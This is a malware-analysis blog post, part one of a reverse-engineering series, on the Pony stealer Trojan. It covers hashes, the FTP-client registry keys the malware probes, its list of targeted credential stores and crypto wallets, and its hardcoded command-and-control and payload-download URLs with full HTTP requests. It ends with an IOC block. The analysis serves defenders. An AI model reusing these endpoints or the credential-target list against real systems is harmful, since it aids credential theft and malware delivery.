Reversing the Pony Trojan Part I
Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/) . In this post we will try to cover the reversing of pony Trojan.
Tools required
- VMware
- IDA Disassembler
- OllyDbg Debugger
- Hex editor
First, we will examine its dynamic analysis behavior.
| FILE NAME | tt2.exe |
| FILE SIZE | 209408 bytes |
| FILE TYPE | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
| MD5 | 6245899b11a6bd6769b3656943322d13 |
| SHA1 | 9879565d8c82e356cb7da62b9f04c3707cd3aac8 |
| SHA256 | 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1 |
| SHA512 | 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080 |
| CRC32 | 906EA658 |
| SSDEEP | 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D |
| YARA | None matched |
Running it though Cuckoo we get the following basic details about it:
We now have an initial idea what the malware is doing. It can be summarized as:
- Connects to traffic.
- Has an anti-sandbox feature (based on time difference)
- Hooks and Reads browser data.
- Hides itself in ADS.
Look at some of its some of its registry modification or retrievals.
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 6 HomeQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 6 ProfessionalQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 7 HomeQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 7 ProfessionalQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 8 HomeQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 8 ProfessionalQCToolbar
HKEY_CURRENT_USERSoftwareGlobalSCAPECuteFTP 9QCToolbar
HKEY_CURRENT_USERSoftwareFlashFXP3
HKEY_CURRENT_USERSoftwareFlashFXP
HKEY_CURRENT_USERSoftwareFlashFXP4
HKEY_LOCAL_MACHINESoftwareFlashFXP3
HKEY_LOCAL_MACHINESoftwareFlashFXP
HKEY_LOCAL_MACHINESoftwareFlashFXP4
HKEY_CURRENT_USERSoftwareFileZilla
HKEY_CURRENT_USERSoftwareFileZilla Client
HKEY_LOCAL_MACHINESoftwareFileZilla
HKEY_LOCAL_MACHINESoftwareFileZilla Client
HKEY_CURRENT_USERSoftwareBPFTPBullet Proof FTPMain
HKEY_CURRENT_USERSoftwareBulletProof SoftwareBulletProof FTP ClientMain
HKEY_CURRENT_USERSoftwareBPFTPBullet Proof FTPOptions
HKEY_CURRENT_USERSoftwareBulletProof SoftwareBulletProof FTP ClientOptions
HKEY_CURRENT_USERSoftwareBPFTP
HKEY_CURRENT_USERSoftwareTurboFTP
HKEY_LOCAL_MACHINESoftwareTurboFTP
HKEY_CURRENT_USERSoftwareSotaFFFTP
HKEY_CURRENT_USERSoftwareSotaFFFTPOptions
HKEY_CURRENT_USERSoftwareCoffeeCup SoftwareInternetProfiles
HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites
HKEY_CURRENT_USERSoftwareFTP ExplorerFTP ExplorerWorkspaceMFCToolBar-224
HKEY_CURRENT_USERSoftwareFTP ExplorerProfiles
HKEY_CURRENT_USERSoftwareVanDykeSecureFX
HKEY_CURRENT_USERSoftwareCryerWebSitePublisher
HKEY_CURRENT_USERSoftwareExpanDriveSessions
HKEY_CURRENT_USERSoftwareExpanDrive
HKEY_LOCAL_MACHINESoftwareNCH SoftwareClassicFTPFTPAccounts
HKEY_CURRENT_USERSoftwareNCH SoftwareClassicFTPFTPAccounts
HKEY_CURRENT_USERSOFTWARENCH SoftwareFlingAccounts
HKEY_LOCAL_MACHINESOFTWARENCH SoftwareFlingAccounts
HKEY_CURRENT_USERSoftwareFTPClientSites
HKEY_LOCAL_MACHINESoftwareFTPClientSites
HKEY_CURRENT_USERSoftwareSoftX.orgFTPClientSites
HKEY_LOCAL_MACHINESoftwareSoftX.orgFTPClientSites
HKEY_CURRENT_USERSOFTWARELeapWare
HKEY_LOCAL_MACHINESOFTWARELeapWare
HKEY_CURRENT_USERSoftwareMartin Prikryl
HKEY_LOCAL_MACHINESoftwareMartin Prikryl
HKEY_CURRENT_USERSoftwareSouth River TechnologiesWebDriveConnections
HKEY_LOCAL_MACHINESoftwareSouth River TechnologiesWebDriveConnections
As you can see, it is evident that it is trying to look for stored password related information. Apart from stored credentials, it also steals bitcoin. Following is the list software it tries to steal from:
| AR Manager | FTPGetter | Pocomail |
| Total Commander | ALFTP | IncrediMail |
| WS_FTP | Internet Explorer | The Bat! |
| CuteFTP | Dreamweaver | Outlook |
| FlashFXP | DeluxeFTP | Thunderbird |
| FileZilla | Google Chrome | FastTrackFTP |
| FTP Commander | Chromium / SRWare Iron | Bitcoin |
| BulletProof FTP | ChromePlus | Electrum |
| SmartFTP | Bromium (Yandex Chrome) | MultiBit |
| TurboFTP | Nichrome | FTP Disk |
| FFFTP | Comodo Dragon | Litecoin |
| CoffeeCup FTP / Sitemapper | RockMelt | Namecoin |
| CoreFTP | K-Meleon | Terracoin |
| FTP Explorer | Epic | Bitcoin Armory |
| Frigate3 FTP | Staff-FTP | PPCoin (Peercoin) |
| SecureFX | AceFTP | Primecoin |
| UltraFXP | Global Downloader | Feathercoin |
| FTPRush | FreshFTP | NovaCoin |
| WebSitePublisher | BlazeFTP | Freicoin |
| BitKinex | NETFile | Devcoin |
| ExpanDrive | GoFTP | Frankocoin |
| ClassicFTP | 3D-FTP | ProtoShares |
| Fling | Easy FTP | MegaCoin |
| SoftX | Xftp | Quarkcoin |
| Directory Opus | FTP Now | Worldcoin |
| FreeFTP / DirectFTP | Robo-FTP | Infinitecoin |
| LeapFTP | LinasFTP | Ixcoin |
| WinSCP | Cyberduck | Anoncoin |
| 32bit FTP | Putty | BBQcoin |
| NetDrive | Notepad + + | Digitalcoin |
| WebDrive | CoffeeCup Visual Site Designer | Mincoin |
| FTP Control | FTPShell | Goldcoin |
| Opera | FTPInfo | Yacoin |
| WiseFTP | NexusFile | Zetacoin |
| FTP Voyager | FastStone Browser | Fastcoin |
| Firefox | CoolNovo | I0coin |
| FireFTP | WinZip | Tagcoin |
| SeaMonkey | Yandex.Internet / Ya.Browser | Bytecoin |
| Flock | MyFTP | Florincoin |
| Mozilla | sherrod FTP | Phoenixcoin |
| LeechFTP | NovaFTP | Luckycoin |
| Odin Secure FTP Expert | Windows Mail | Craftcoin |
| WinFTP | Windows Live Mail | Junkcoin |
| FTP Surfer | Becky! |
It copies itself into the system by using an integer filename, which is executed though a chain of ShellExecuteEx
| FILE NAME | 31780534.exe |
| FILE SIZE | 317440 bytes |
| FILE TYPE | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
| MD5 | 2bd7a3cc81ae70b16b2a85008fb7dd81 |
| SHA1 | 7bf35f051a44dc31f0b138e1874e1d75745d49b3 |
| SHA256 | 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856 |
| CRC32 | 4AA8F5BD |
| SSDEEP | 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M |
| YARA | None matched |
Not only does pony steal information, but it also downloads other malware, which are hardcoded in the binary itself
| http://titratresfi.ru/gate.php | POST /gate.php HTTP/1.0 Host: titratresfi.ru Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 270 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) |
|
| http://adishma.com/media/system/shost.exe | GET /media/system/shost.exe HTTP/1.0 Host: adishma.com Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) |
|
Now let’s look at the network traffic it has generated.
It sends basic information to the command and control server, which we are going to examine deeply in the second post.
Network information
domain: TITRATRESFI.RU
nserver: ns1.entrydns.net.
nserver: ns2.entrydns.net.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2015.11.09
paid-till: 2016.11.09
free-date: 2016.12.10
source: TCI
Last updated on 2015.11.15 16:16:33 MSK
Domain Name: ADISHMA.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SOFTONETECHNOLOGIES.COM
Name Server: NS2.SOFTONETECHNOLOGIES.COM
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Updated Date: 07-sep-2015
Creation Date: 26-dec-2014
Expiration Date: 26-dec-2015
IOC
<Indicator id=”aae1b2d0-a5ad-471a-8c48-2296f6cfb49e” operator=”OR”>
<IndicatorItem condition=”is” id=”b1984833-80fe-446b-a3d8-3349822f6336″>
<Context document=”FileItem” search=”FileItem/Md5sum” type=”mir”/>
<Content type=”md5″>6245899b11a6bd6769b3656943322d13</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”e2168e97-5db8-4432-b498-8a5973deeb42″>
<Context document=”FileItem” search=”FileItem/Sha1sum” type=”mir”/>
<Content type=”sha1″>9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”f66fb3f0-1178-4638-bf06-24d131cfd2c7″>
<Context document=”FileItem” search=”FileItem/Sha256sum” type=”mir”/>
<Content type=”sha256″>15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
</IndicatorItem>
<Indicator id=”81c75ab7-69b2-434d-808f-607a5b283cec” operator=”AND”>
<IndicatorItem condition=”is” id=”bb45ed4b-823c-41d0-8831-0ab41c874a7f”>
<Context document=”FileItem” search=”FileItem/FileName” type=”mir”/>
<Content type=”string”>Centrylink</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”9194b695-6af4-428f-b2cf-3a40c2560e78″>
<Context document=”FileItem” search=”FileItem/SizeInBytes” type=”mir”/>
<Content type=”int”>209408</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”010608b2-0016-426d-9dce-2e9ad855f786″>
<Context document=”FileItem” search=”FileItem/PEInfo/PETimeStamp” type=”mir”/>
<Content type=”date”>2015-11-12T09:49:00Z</Content>
</IndicatorItem>
</Indicator>
Using VT we are able to map other files which are using the same location for downloading other malware.
